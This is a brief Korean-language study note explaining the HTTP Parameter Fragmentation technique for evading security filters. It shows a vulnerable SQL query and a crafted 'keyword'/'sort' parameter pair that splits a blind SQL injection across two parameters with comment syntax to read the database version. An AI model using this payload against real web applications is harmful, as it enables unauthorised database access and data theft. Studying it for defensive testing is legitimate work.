5) 보안 솔루션 및 입력 값 검증 우회 기법

HPF(HTTP Parameter Fragmentation)기법

HPF 기법 적용한 요청 예시

SELECT * FROM board WHERE title like '%[keyword]%'order by[sort]desc

keyword=' and ascii(substring/*&sort=*/(@@version,1,1))&1=--

↓

SELECT * FROM board WHERE title like '%' and ascii(substring/*%'order by*/(@@version,1,1))&1=--desc

쿼리 문장하나에 keyword랑 sort 파라미터를 입력할 수 있어야 공격이 가능하다.